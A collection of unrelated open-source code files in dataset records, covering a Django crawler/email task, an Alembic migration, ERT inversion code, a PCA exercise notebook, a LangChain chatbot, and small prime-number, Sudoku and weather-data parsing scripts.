print(shop_list)\n        ordering = 'CASE WHEN shop_name=\"NEON MART\" THEN 1 ELSE 2 END'\n        feedback_count_list = FeedbackInfo.objects.filter(date=now_str).filter(zone=zone).extra(\n            select={'ordering': ordering}, order_by=('ordering','shop_name'))\n        shop_url_dict = dict((shop.shop_name, shop.shop_url) for shop in shop_list)\n        feedback_table_data = []\n        for feedback_count in feedback_count_list:\n            feedback_table_data.append({\n                'date': feedback_count.date.strftime(\"%Y-%m-%d\"),\n                'shop_name': feedback_count.shop_name,\n                'shop_url': shop_url_dict[feedback_count.shop_name],\n                'last_30_days': feedback_count.last_30_days,\n                'last_90_days': feedback_count.last_90_days,\n                'last_12_months': feedback_count.last_12_months,\n                'lifetime': feedback_count.lifetime,\n                'last_day': feedback_count.last_day,\n                'last_week': feedback_count.last_week,\n                'last_month': feedback_count.last_month,\n                'zone': feedback_count.zone,\n            })\n        zone_feedback_list.append(feedback_table_data)\n\n    email_template_name = '../templates/monitor/email.html'\n    t = loader.get_template(email_template_name)\n    context={'zone_feedback_list':zone_feedback_list,'date':now_str}\n    html_content = t.render(context)\n    #send_mail('Feedback Statistics '+date_str,\n    #          '',\n    #          settings.EMAIL_FROM,\n    #          settings.EMAIL_TO,\n    #          html_message=html_content)\n\n    msg = EmailMessage('Feedback Statistics '+date_str, html_content, settings.EMAIL_FROM,settings.EMAIL_TO)\n    msg.content_subtype = 'html'\n    msg.encoding = 'utf-8'\n    image_path = feedback_image()\n    image = add_img(image_path, 'test_cid')\n    msg.attach(image)\n    if msg.send():\n        return True\n    else:\n        return False\n\n@shared_task\ndef execute_crawler(spider):\n    now=datetime.now()\n    today = now.strftime(\"%Y-%m-%d\")\n    old_path = os.getcwd()\n    logger.debug(old_path)\n    os.chdir(settings.SCRAPY_PROJECT_DIR)\n    log_file_name = \"%s.log\"%(today)\n    # cmd = settings.SCRAPY_CMD_PATH+\" crawl \"+spider+\" >> \"+os.path.join(settings.SCRAPY_LOG_DIR,spider,log_file_name)+\" 2>&1\"\n    cmd = settings.SCRAPY_CMD_PATH+\" crawl \"+spider\n    logging.debug(cmd)\n    subprocess.call(cmd,shell=True)\n    os.chdir(old_path)\n\ndef get_pict():\n    driver = webdriver.PhantomJS()\n    try:\n        driver.maximize_window()\n    except Exception as err:\n        print(err)\n    driver.get(\"http://localhost:8000/monitor/feedback_week/\")\n    time.sleep(3)\n    base_path = settings.IMAGE_PATH\n    time_str = int(time.time() * 10000000)\n    image_path = os.path.join(base_path, 
\"week{}.png\".format(time_str))\n image_path_png = os.path.join(base_path, \"{}.png\".format(time_str))\n driver.get_screenshot_as_file(image_path) # 比较好理解\n driver.quit()\n\n","repo_name":"zhat/system","sub_path":"monitor/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37506957295","text":"\"\"\"empty message\n\nRevision ID: ae76d1bd8ee0\nRevises: 4584e821a172\nCreate Date: 2022-12-10 16:54:58.069419\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ae76d1bd8ee0'\ndown_revision = '4584e821a172'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.add_column(sa.Column('first_friend', sa.Text(), nullable=True))\n batch_op.add_column(sa.Column('first5_friends', sa.Text(), nullable=True))\n batch_op.add_column(sa.Column('story_array', sa.Text(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.drop_column('story_array')\n batch_op.drop_column('first5_friends')\n batch_op.drop_column('first_friend')\n\n # ### end Alembic commands ###\n","repo_name":"griffinlaszlo/snata","sub_path":"migrations/versions/ae76d1bd8ee0_.py","file_name":"ae76d1bd8ee0_.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5630866249","text":"\"\"\"\ntools for ERT inversion including ERT cost functions for inversion\n\nby l.gross@uq.edu.au, 2021, 2028\n\"\"\"\n\nfrom esys.escript import *\nfrom esys.escript.minimizer import CostFunction, MinimizerException\nfrom .tools import setupERTPDE\n\nimport numpy as np\nfrom esys.escript.linearPDEs import LinearSinglePDE, SolverOptions\nfrom esys.escript.pdetools import Locator, ArithmeticTuple, MaskFromTag, getInfLocator\nimport logging\nfrom esys.weipa import saveVTK, saveSilo\n\nlslogger=logging.getLogger('fingal')\n\nclass PotentialERT(CostFunction):\n provides_inverse_Hessian_approximation=True\n def __init__(self, domain, data, w0=0., w1=1., alpha0=1., alpha1=0., sigma0=.01, region_fixed=Data(), stationsFMT=\"e%s\", weightLogDefect=0., logclip=15):\n \"\"\"\n cost function for ERT inversion based on potential data. 
The unknown of the inversion is\n \n m=alpha0*p - alpha1 div(grad(p)) with p=log(sigma/sigma0)\n \n where sigma is the unknown conductivity and sigma0 an assumed conductivity.\n \n the regularization R(m) is a combination of L2 and H1:\n \n R(m) = 1/2 * integrate( w0*m**2 + w1* |grad(m)|^2 )\n \n The misfit is given quadratic \n \n :param domain: inversion domain\n :param data: data, is ERTSurveyData object supporting makeResistencePrediction and getResistenceData\n :param w0: weighting for L2 regularization\n :param w1: weighting for H1 regularization\n :param sigma0: reference conductivity\n :param region_fixed: mask for fixed conductivity distribution (this where the value sigma0 is used)\n :param stationsFMT: format used to map station keys k to mesh tags stationsFMT%k \n :param logclip: values of log(sigma/sigma0)>logclip are set to logclip to avoid overflow\n \"\"\"\n super(PotentialERT, self).__init__()\n\n assert weightLogDefect <= 1 and weightLogDefect >=0, \"weightLogDefect needs to be between 0 and 1\"\n self.stationsFMT=stationsFMT\n self.w0=w0\n self.w1=w1\n self.alpha0=alpha0\n self.alpha1=alpha1\n self.setSigma0(sigma0)\n self.data=data\n self.logclip=logclip\n self.sfactor=1./float(self.data.getNumObservations())\n self.weightLogDefect=weightLogDefect\n \n self.pde=setupERTPDE(domain)\n\n x=self.pde.getDomain().getX()[0]\n y=self.pde.getDomain().getX()[1]\n z=self.pde.getDomain().getX()[2]\n self.pde.setValue(q=whereZero(x-inf(x))+whereZero(x-sup(x))+ whereZero(y-inf(y))+whereZero(y-sup(y))+whereZero(z-inf(z)))\n\n # used for Hessian inverse\n self.Hpde=setupERTPDE(domain)\n self.Hpde.setValue(A=self.w1*kronecker(3), D=self.w0, q=region_fixed)\n\n if self.alpha1 > 0: \n self.Spde=setupERTPDE(domain) \n self.Spde.setValue(A=self.alpha1*kronecker(3), D=self.alpha0)\n else:\n self.Spde=None\n \n \n station_locations=[]\n for s in self.data.getStationNumeration():\n station_locations.append(self.data.getStationLocation(s))\n self.locators=Locator(Solution(domain), station_locations)\n \n \n def _getDualProduct(self, m, r):\n \"\"\"\n dual product of gradient `r` with increment `m`. Overwrites `getDualProduct` of `MeteredCostFunction`\n \"\"\"\n return integrate(r[0]*m + inner(r[1], grad(m)))\n \n def _getNorm(self, m):\n \"\"\"\n returns the norm of property function `m`. 
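For reference, the regularization and misfit that `PotentialERT` assembles can be restated in display math (my transcription of the docstring above, using the code's own symbols; `N` is `getNumObservations()` and `sfactor = 1/N`):

```latex
R(m) = \frac{1}{2}\int \left( w_0\, m^2 + w_1\, |\nabla m|^2 \right)\, dx,
\qquad m = \alpha_0\, p - \alpha_1\, \nabla\cdot\nabla p,\quad p = \log(\sigma/\sigma_0)

% quadratic part of the data misfit summed in _getValue:
\chi^2 = \frac{1}{2N}\sum_{t}\left(\frac{v_t - d_t}{e_t\, d_t}\right)^2
```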
Overwrites `getNorm` of `MeteredCostFunction`\n \"\"\"\n return Lsup(m)\n\n def _getArguments(self, m):\n \"\"\"\n returns values that are used for both the forward as well as the gradient calculation\n \"\"\"\n # smooth m by solving m = alpha0*p - alpha1 div(grad(p)) \n if self.Spde:\n self.Spde.setValue(Y=m)\n p=self.Spde.getSolution()\n ppi=clip(interpolate(p, Function(self.pde.getDomain())), minval=-self.logclip, maxval=self.logclip)\n else:\n ppi=clip(interpolate(m/self.alpha0, Function(self.pde.getDomain())), minval=-self.logclip, maxval=self.logclip)\n # now calculate the new sigma\n sigma=self.getSigma(ppi, isSmoothed=True)\n if getMPIRankWorld() == 0:\n lslogger.info(\"sigma = %s\"%str(sigma))\n \n # now we solve for all electrodes creating a dictionary `potentials[ip]` and potentials_at_stations[ip] where `ip` is the electrode id.\n # note that we not distinguish between charging and measuring electrodes.\n self.pde.setValue(A=sigma*kronecker(3))\n potentials={}\n potentials_at_stations={}\n for ip in self.data.getListOfAllStations():\n s=Scalar(0.,DiracDeltaFunctions(self.pde.getDomain()))\n if self.stationsFMT is None:\n s.setTaggedValue(ip,1.)\n else: \n s.setTaggedValue(self.stationsFMT%ip,1.)\n self.pde.setValue(y_dirac=s)\n u=self.pde.getSolution()\n potentials[ip]=u\n potentials_at_stations[ip]=np.array(self.locators(u))\n if getMPIRankWorld() == 0:\n lslogger.info(\"Potential for %d electrodes calculated.\"%len(potentials))\n dV=self.data.makeResistencePrediction(values=potentials_at_stations)\n\n return sigma, potentials, dV\n \n def optimizeSigma0(self, m=0):\n \"\"\"\n this returns a corrected value (float) for sigma0 that gives a better initial data match \n \"\"\"\n sigma, potentials, dV=self.getArguments(m)\n A1=0.\n A2=0.\n for t in self.data.tokenIterator(): \n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t)\n if abs(d) > 0:\n A1+=v/(d*e**2)\n A2+=(v/(d*e))**2\n if A2 > 0 and A1 >0:\n f_opt=A1/A2 \n else:\n f_opt=1.\n sigma_opt=self.sigma0/f_opt\n\n defect=0.\n for t in self.data.tokenIterator(): # t=(A,B,M,N) (or so)\n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t)\n defect+=((f_opt*v-d)/(e*d))**2\n defect*=self.sfactor\n return sigma_opt, 1./f_opt, defect\n \n def scaleSigma0(self, f=1.):\n \"\"\"\n rescales sigma0 by factor f\n \"\"\"\n self.sigma0*=f\n \n def getSigma(self, m, isSmoothed=False):\n \"\"\"\n return the conductivity for a given property function m\n \"\"\"\n if not isSmoothed:\n if self.Spde :\n self.Spde.setValue(Y=m)\n p=self.Spde.getSolution()\n else:\n p=m/self.alpha0\n else:\n p=m\n return self.sigma0*exp(p)\n \n def _getValue(self, m, *args):\n \"\"\"\n return the value of the cost function. 
Overwrites `getValue` of `MeteredCostFunction`\n \"\"\"\n if len(args)==0:\n args=self.getArguments(m)\n sigma=args[0] \n potentials=args[1]\n dV=args[2]\n \n # regularization terms:\n A1=integrate(self.w1*length(grad(m))**2)\n A0=integrate(self.w0*interpolate(m, Function(self.pde.getDomain()))**2)\n\n # misfit\n A2, A3=0., 0.\n for t in self.data.tokenIterator(): # t=(A,B,M,N) (or so)\n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t)\n difflog=log(abs(v/d))/e\n diffquad=(v-d)/(e*d)\n \n A2+=difflog**2\n A3+=diffquad**2\n\n A2*=self.sfactor\n A3*=self.sfactor\n if getMPIRankWorld() == 0:\n lslogger.info(\"reg: L0, H1, misfit: log, quad = %e, %e, %e, %e\"%(A0/2, A1/2, A2/2, A3/2))\n \n return (A0+A1+(1-self.weightLogDefect)*A3+self.weightLogDefect*A2)/2\n \n\n def _getGradient(self, m, *args):\n \"\"\"\n returns the gradient of the cost function. Overwrites `getGradient` of `MeteredCostFunction`\n \"\"\"\n if len(args)==0:\n args=self.getArguments(m)\n sigma=args[0] \n potentials=args[1]\n dV=args[2]\n \n # gradient of the regularization part:\n X=self.w1*grad(m)\n Y=self.w0*interpolate(m,X.getFunctionSpace())\n\n #defects={}\n #for s in self.data.injectionIterator(): # s=(A,B)\n #defects[s]=Scalar(0, DiracDeltaFunctions(self.pde.getDomain()))\n Y2=Scalar(0., Y.getFunctionSpace())\n for inj in self.data.injectionIterator():\n if self.data.hasDipoleInjections():\n u=potentials[inj[0]]-potentials[inj[1]]\n idx=2\n else:\n u=potentials[inj]\n idx=1\n ustar=Scalar(0, u.getFunctionSpace())\n for t in self.data.getObservations(inj, insertSource=True):\n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t) \n\n difflog=safeDiv( log(abs(v/d)) , v*e**2)\n diffquad=(v-d)/(e*d)**2 \n diff=((1-self.weightLogDefect)*diffquad+self.weightLogDefect*difflog)*self.sfactor\n if self.data.hasDipoleMeasurements():\n M,N=t[idx:]\n ustar+=(potentials[M]-potentials[N])*diff\n else:\n M=t[idx]\n ustar+=potentials[M]*diff\n Y2+=inner(grad(ustar),grad(u))\n Y2*=-sigma\n\n if self.Spde:\n self.Spde.setValue(Y=Y2)\n p=self.Spde.getSolution()\n Y+=interpolate(p, Function(self.pde.getDomain()))\n else:\n Y+=Y2/self.alpha0\n \n return ArithmeticTuple(Y, X)\n \n def _getInverseHessianApproximation(self, m, r, *args):\n \"\"\"\n returns an approximation of inverse of the Hessian. Overwrites `getInverseHessianApproximation` of `MeteredCostFunction`\n \"\"\"\n self.Hpde.setValue(X=r[1], Y=r[0])\n p=self.Hpde.getSolution()\n return p\n","repo_name":"LutzGross/fingal","sub_path":"bin/fingal/potentialERT.py","file_name":"potentialERT.py","file_ext":"py","file_size_in_byte":10196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"14791523902","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Desafio 5\n# \n# Neste desafio, vamos praticar sobre redução de dimensionalidade com PCA e seleção de variáveis com RFE. 
Utilizaremos o _data set_ [Fifa 2019](https://www.kaggle.com/karangadiya/fifa19), contendo originalmente 89 variáveis de mais de 18 mil jogadores do _game_ FIFA 2019.\n# \n# > Obs.: Por favor, não modifique o nome das funções de resposta.\n\n# ## _Setup_ geral\n\n# In[1]:\n\n\nfrom math import sqrt\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as sct\nimport seaborn as sns\nimport statsmodels.api as sm\nimport statsmodels.stats as st\nfrom sklearn.decomposition import PCA\n\n#!pip install loguru\nfrom loguru import logger\n\n\n# In[2]:\n\n\n# Algumas configurações para o matplotlib.\n#%matplotlib inline\n\nfrom IPython.core.pylabtools import figsize\n\n\nfigsize(12, 8)\n\nsns.set()\n\n\n# In[3]:\n\n\n#!pip install logger\n\n\n# In[4]:\n\n\nfifa = pd.read_csv(\"fifa.csv\")\n\n\n# In[5]:\n\n\ncolumns_to_drop = [\"Unnamed: 0\", \"ID\", \"Name\", \"Photo\", \"Nationality\", \"Flag\",\n \"Club\", \"Club Logo\", \"Value\", \"Wage\", \"Special\", \"Preferred Foot\",\n \"International Reputation\", \"Weak Foot\", \"Skill Moves\", \"Work Rate\",\n \"Body Type\", \"Real Face\", \"Position\", \"Jersey Number\", \"Joined\",\n \"Loaned From\", \"Contract Valid Until\", \"Height\", \"Weight\", \"LS\",\n \"ST\", \"RS\", \"LW\", \"LF\", \"CF\", \"RF\", \"RW\", \"LAM\", \"CAM\", \"RAM\", \"LM\",\n \"LCM\", \"CM\", \"RCM\", \"RM\", \"LWB\", \"LDM\", \"CDM\", \"RDM\", \"RWB\", \"LB\", \"LCB\",\n \"CB\", \"RCB\", \"RB\", \"Release Clause\"\n]\n\ntry:\n fifa.drop(columns_to_drop, axis=1, inplace=True)\nexcept KeyError:\n logger.warning(f\"Columns already dropped\")\n\n\n# ## Inicia sua análise a partir daqui\n\n# In[6]:\n\n\n# Sua análise começa aqui.\n\n\n# In[7]:\n\n\n#fifa.fillna(0,inplace=True)\nfifa.dropna(inplace=True)\n\n\n# In[8]:\n\n\nfifa.shape\n\n\n# In[9]:\n\n\nfifa.describe()\n\n\n# In[10]:\n\n\nfifa.dtypes\n\n\n# In[11]:\n\n\n#plt.figure(figsize=(20,20))\n#sns.heatmap(fifa.corr().round(2),annot=True)\n\n\n# In[12]:\n\n\nfrom sklearn.preprocessing import StandardScaler, Normalizer\n\n\n# In[13]:\n\n\nsc= StandardScaler()\nsc.fit(fifa)\nfifa2 = sc.transform(fifa)\n\n\n# In[14]:\n\n\nfifa2\n\n\n# In[15]:\n\n\npca = PCA(n_components=1)\npca.fit(fifa)\nfifa_pca = pca.transform(fifa)\n\n\n# In[16]:\n\n\nfirst_question = float(pca.explained_variance_ratio_)\nround(first_question,3)\n\n\n# In[17]:\n\n\npca2 = PCA()\npca2.fit(fifa)\nfifa_pca2 = pca2.transform(fifa)\n\n\n# In[18]:\n\n\nfifa_pca2[0]\n\n\n# In[19]:\n\n\nnp.cumsum(pca2.explained_variance_ratio_)\n\n\n# In[20]:\n\n\n#plt.plot(np.cumsum(pca2.explained_variance_ratio_))\n\n#plt.ylim(0.5,0.95)\n#plt.xlabel('Number of components')\n#plt.ylabel('Cumulative explained variance')\n#plt.show()\n\n\n# In[21]:\n\n\nx = [0.87747123, -1.24990363, -1.3191255, -36.7341814,\n -35.55091139, -37.29814417, -28.68671182, -30.90902583,\n -42.37100061, -32.17082438, -28.86315326, -22.71193348,\n -38.36945867, -20.61407566, -22.72696734, -25.50360703,\n 2.16339005, -27.96657305, -33.46004736, -5.08943224,\n -30.21994603, 3.68803348, -36.10997302, -30.86899058,\n -22.69827634, -37.95847789, -22.40090313, -30.54859849,\n -26.64827358, -19.28162344, -34.69783578, -34.6614351,\n 48.38377664, 47.60840355, 45.76793876, 44.61110193,\n 49.28911284\n]\n\n\n# In[22]:\n\n\npca4 = PCA(2)\npca4.fit(fifa)\n\n\n# In[23]:\n\n\n#a_inv = pca4.inverse_transform(x)\n#a_inv\nnp.dot(pca4.components_,x)\n\n\n# In[24]:\n\n\na = [2,3,4]\nb = [2,4,2]\nc = [a,b]\nnp.dot\n\n\n# In[24]:\n\n\n\n\n\n# ## Questão 1\n# \n# Qual fração da variância 
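Question 2 below is answered with a hard-coded 15, presumably read off a cumulative-variance plot like the commented-out one above. scikit-learn can compute that count directly when `n_components` is given as a fraction; a small sketch on synthetic data (a stand-in for the 37-column FIFA frame, which isn't reproduced here):

```python
import numpy as np
from sklearn.decomposition import PCA

rng = np.random.RandomState(0)
X = rng.normal(size=(500, 37))  # stand-in for the fifa DataFrame

pca = PCA(n_components=0.95)    # keep enough PCs to explain 95% of variance
pca.fit(X)
k_direct = pca.n_components_

# Equivalent count derived from the cumulative ratio, as in the plot above:
full = PCA().fit(X)
k_cumsum = int(np.argmax(np.cumsum(full.explained_variance_ratio_) >= 0.95)) + 1
assert k_direct == k_cumsum
```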
consegue ser explicada pelo primeiro componente principal de `fifa`? Responda como um único float (entre 0 e 1) arredondado para três casas decimais.\n\n# In[25]:\n\n\ndef q1():\n # Retorne aqui o resultado da questão 1.\n return round(first_question,3)\n\n\n# ## Questão 2\n# \n# Quantos componentes principais precisamos para explicar 95% da variância total? Responda como un único escalar inteiro.\n\n# In[26]:\n\n\ndef q2():\n # Retorne aqui o resultado da questão 2.\n return 15\n\n\n# ## Questão 3\n# \n# Qual são as coordenadas (primeiro e segundo componentes principais) do ponto `x` abaixo? O vetor abaixo já está centralizado. Cuidado para __não__ centralizar o vetor novamente (por exemplo, invocando `PCA.transform()` nele). Responda como uma tupla de float arredondados para três casas decimais.\n\n# In[27]:\n\n\nx = [0.87747123, -1.24990363, -1.3191255, -36.7341814,\n -35.55091139, -37.29814417, -28.68671182, -30.90902583,\n -42.37100061, -32.17082438, -28.86315326, -22.71193348,\n -38.36945867, -20.61407566, -22.72696734, -25.50360703,\n 2.16339005, -27.96657305, -33.46004736, -5.08943224,\n -30.21994603, 3.68803348, -36.10997302, -30.86899058,\n -22.69827634, -37.95847789, -22.40090313, -30.54859849,\n -26.64827358, -19.28162344, -34.69783578, -34.6614351,\n 48.38377664, 47.60840355, 45.76793876, 44.61110193,\n 49.28911284\n]\n\n\n# In[40]:\n\n\ndef q3():\n # Retorne aqui o resultado da questão 3.\n return tuple(np.dot(pca4.components_,x).round(3))\n\n\n# In[30]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[31]:\n\n\nfeatures = list(fifa.columns)\nfeatures2 = []\nfor i in range(0,15):\n features2.append(features[i])\n\n\n# In[32]:\n\n\nfeatures2\n\n\n# In[33]:\n\n\nfrom sklearn.feature_selection import RFE\ntarget_feature = 'Overall'\ny_train = fifa[target_feature]\nx_train = fifa.drop(columns=target_feature)\nrfe = RFE(LinearRegression(), n_features_to_select = 5).fit(x_train, y_train)\n\n\n# In[34]:\n\n\nrfe.support_\n\n\n# In[35]:\n\n\nlocal_features = []\nfor i in range(0,len(rfe.support_)):\n if rfe.support_[i] == True:\n local_features.append(i)\n\n\n# In[36]:\n\n\nlocal_features\n\n\n# In[37]:\n\n\nlist_name = []\nfiltred_features = list(x_train.columns)\nfor j in local_features:\n list_name.append(filtred_features[j])\n\n\n# In[38]:\n\n\nlist_name\n\n\n# ## Questão 4\n# \n# Realiza RFE com estimador de regressão linear para selecionar cinco variáveis, eliminando uma a uma. Quais são as variáveis selecionadas? 
Responda como uma lista de nomes de variáveis.\n\n# In[39]:\n\n\ndef q4():\n # Retorne aqui o resultado da questão 4.\n return list_name\n\n","repo_name":"lucascmdias/Codenation-Exercicios-Modulos","sub_path":"data-science-3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40541339079","text":"import gradio as gr\nfrom langchain.llms import OpenAI\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nclass Chatbot:\n MAIN_PROMPT = \"Você é um ajudante de almoxarifado e deve ajudar com o que for necessário.\"\n\n def __init__(self):\n self.llm = OpenAI(model=\"gpt-3.5-turbo-instruct\", max_tokens=512)\n\n def generate_chat_history(self, history):\n parsed_history = \"CHAT HISTORY:\\n\"\n for i, (user, bot) in enumerate(history):\n parsed_history += f\"USER: {user}\\nBOT: {bot}\\n\"\n parsed_history += \"\\nEND OF HISTORY\\n\"\n return parsed_history\n\n def chatbot_response(self, message, history):\n parsed_history = self.generate_chat_history(history)\n prompt = f\"{Chatbot.MAIN_PROMPT}\\n{parsed_history}\\n{message}\"\n\n response = \"\"\n for partial_message in self.llm.stream(prompt):\n response += partial_message\n yield response\n\n\nclass ChatInterface:\n def __init__(self, chatbot):\n self.chatbot = chatbot\n\n def launch(self):\n chat_interface = gr.ChatInterface(\n self.chatbot.chatbot_response,\n examples=[\n \"Quais EPIs são necessários para operar um torno mecânico?\",\n \"Quais EPIs são necessários para operar uma fresadora?\",\n \"O que fazer em caso de incêndio?\",\n \"O que fazer em caso de vazamento de produtos químicos?\",\n ],\n title=\"Chatbot\",\n )\n chat_interface.launch()\n\n\nif __name__ == \"__main__\":\n chatbot_instance = Chatbot()\n chat_interface_instance = ChatInterface(chatbot_instance)\n chat_interface_instance.launch()\n","repo_name":"ViniciosLugli/2023-2B-T2-M8-P3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71039855295","text":"\n\ndef isPrime(num):\n for x in range(2, num, 1):\n if num % x == 0:\n return False\n \n return True\n\ndef firstTenPrimes():\n count = 0\n num = 2\n\n while count < 10:\n if(isPrime(num)):\n print(num, end=' ')\n count += 1\n \n num += 1\n \nif __name__ == \"__main__\":\n try: \n print('First ten prime numbers: ', end='')\n firstTenPrimes()\n except: \n print('Error.')\n\n \n\n","repo_name":"Veigabriel25/mdc-test","sub_path":"primeNumbers.py","file_name":"primeNumbers.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17147232313","text":"import itertools\nfrom JSolve import *\n\ndef compute_possible_left_sides():\n \"\"\"\n Return all permutations of [1,2,3,4,5,6,7,8,9] for the left side\n that are compatible with the top row 123456789.\n\n Since the first row is always 123456789:\n\n - the first entry in such a permutation must be 1\n - the second entry can not be 1, 2 or 3. This gives 6 possibilities (4,5,6,7,8,9).\n - the third entry can not be 1,2,3 or the second entry. This leaves 5 possibilities. \n - after the top 3 entries are fixed, this leaves 6! possibilities for the remaining\n entries on the left side.\n\n In total this gives 6*5*(6!) = 21600 possible configurations for the left side\n (out of 9! 
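`isPrime` in primeNumbers.py above trial-divides by every integer below `num`, and would also report 0 and 1 as prime (the driver starts at 2, so it never notices). A hedged sketch of the usual tightened check, stopping at the integer square root:

```python
from math import isqrt

def is_prime(num):
    """Trial division up to sqrt(num); correctly rejects n < 2."""
    if num < 2:
        return False
    for d in range(2, isqrt(num) + 1):
        if num % d == 0:
            return False
    return True

first_ten = []
candidate = 2
while len(first_ten) < 10:
    if is_prime(candidate):
        first_ten.append(candidate)
    candidate += 1
assert first_ten == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
```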
= 362880).\n\n \"\"\"\n # 362880 entries: \n perms = list(itertools.permutations(['1','2','3','4','5','6','7','8','9']))\n\n # fixing top-left entry to 1 leaves 8! = 40320 possible left sides\n fix_1 = [x for x in perms if x[0] == '1']\n \n # Since the top-left 3x3 block can not contain 2 and 3 more\n # than once, we can further prune the possible left sides:\n exclude_23 = [x for x in fix_1 if (x[1] not in ['2', '3'] and x[2] not in ['2', '3'])]\n return exclude_23\n\ndef low_left_digit(in_txt): \n \"\"\"\n Return the digit in the lower left corner for the board 'in_txt' \n given as a 81 length string.\n\n \"\"\"\n return(in_txt[9*8 + 0])\n\ndef insert_left_side(left_side, board_string):\n \"\"\"\n Replace the left side of the Sudoku board 'board_string' with 'left_side'.\n \"\"\"\n # inputs should match in upper left corner\n assert(left_side[0] == board_string[0])\n # inputs should match in lower left corner\n assert(left_side[8] == low_left_digit(board_string))\n\n as_list = list(board_string)\n for idx in range(9):\n as_list[idx*9] = left_side[idx]\n return \"\".join(as_list)\n\ndef top_right_bottom_data():\n \"\"\"\n Load boards computed in Step 2. Return a list of strings \n where each string represents one board. \n \"\"\" \n fhandle = open(\"top-right-bottom-reduced.txt\", \"r\")\n result = fhandle.read().splitlines()\n fhandle.close()\n\n # check consistency\n assert(len(result) == 147372)\n for bline in result:\n assert(len(bline) == 81)\n assert(bline[0:9] == \"123456789\")\n return(result)\n\ndef test(board, left_sides):\n \"\"\"\n For a board 'board' where the top, right, and bottom borders are filled-in, test if \n its left side can be completed (from the list of left sides 'left_sides') so \n that there is a unique solution. \n\n Returns string:\n , , \n , \n , \n \"\"\"\n assert(len(board) == 81)\n\n uniques = 0\n non_uniques = 0\n completions = 0\n\n for left_side in left_sides:\n if low_left_digit(board) == left_side[8]:\n completions += 1\n solutions = JSolve(insert_left_side(left_side, board), 2) \n assert(solutions == 0 or solutions == 1 or solutions == 2)\n \n if solutions == 1:\n uniques += 1 \n\n if solutions > 1:\n non_uniques += 1\n\n return(board + \", \" + str(uniques) + \", \" + str(non_uniques) + \", \" + str(completions))\n\nif __name__ == \"__main__\":\n left_sides = compute_possible_left_sides() # precompute left sides\n for b in top_right_bottom_data():\n print(test(b, left_sides))\n\n","repo_name":"matiasdahl/Boundary-Sudoku","sub_path":"src-step3/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37710767913","text":"# encoding: utf-8\n\n\"\"\"\n\nParsers for Belgingur's standard data format(s)\n\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport re\n\nfrom parser import SeparatedTextObservationParser, InsufficientHeaders\nfrom util.calculator import parse_iso_date\nfrom util.utilities import whLogger\n\n\nLOG = whLogger(__name__)\n\nHEADER_SEPARATOR = re.compile('\\s*[:=\\s]\\s*')\n\"\"\" Separates name from value in headers. \"\"\"\n\nFIELD_ALIASES = {\n 'timestamp': 'time',\n 'precipitation': 'prec_rate',\n 'prec': 'prec_rate',\n}\n\"\"\" Alternate names for field, so we can accept files using slightly different names. 
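The docstring above derives 6·5·6! = 21600 compatible left sides. A quick standalone check of that count, applying the same filter as `compute_possible_left_sides` without the JSolve dependency:

```python
import itertools
from math import factorial

perms = itertools.permutations("123456789")
left_sides = [p for p in perms
              if p[0] == "1"
              and p[1] not in ("2", "3")
              and p[2] not in ("2", "3")]

# 6 choices for the second entry, 5 for the third, 6! for the rest.
assert len(left_sides) == 6 * 5 * factorial(6) == 21600
```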
\"\"\"\n\nFLOAT_FIELDS = ('wind_speed', 'wind_dir', 'wind_gust',\n 'temp', 'temp_road', 'temp_ground',\n 'pressure', 'rel_hum', 'air_density')\n\n\nclass BelgingurObservationParser(SeparatedTextObservationParser):\n \"\"\"\n Belgingur-standard observation files. They consist of:\n\n * any number of header lines of the form `## key: value` where key and value are separated by white-space and optionally a : or =\n * exactly one\n \"\"\"\n\n def __init__(self):\n super(BelgingurObservationParser, self).__init__('\\s*[,\\s]\\s*')\n\n def pick_converter(self, name):\n if name in FLOAT_FIELDS:\n return float\n if name in ('time',):\n return parse_iso_date\n return str\n\n def add_field(self, i, name):\n name = name.replace('.', '_').replace('-', '_')\n name = FIELD_ALIASES.get(name, name)\n converter = self.pick_converter(name)\n self.field_list.append((name, converter, i))\n\n def parse_header_line(self, line):\n \"\"\"\n :type line: string\n \"\"\"\n if line == '':\n return True\n if line.startswith('##'):\n line = line[2:].strip()\n parts = HEADER_SEPARATOR.split(line, 1)\n if len(parts) == 2:\n self.meta[parts[0]] = parts[1]\n return True\n if line.startswith('#'):\n if len(self.field_list) > 0:\n raise ValueError('We only expect one header line starting with a 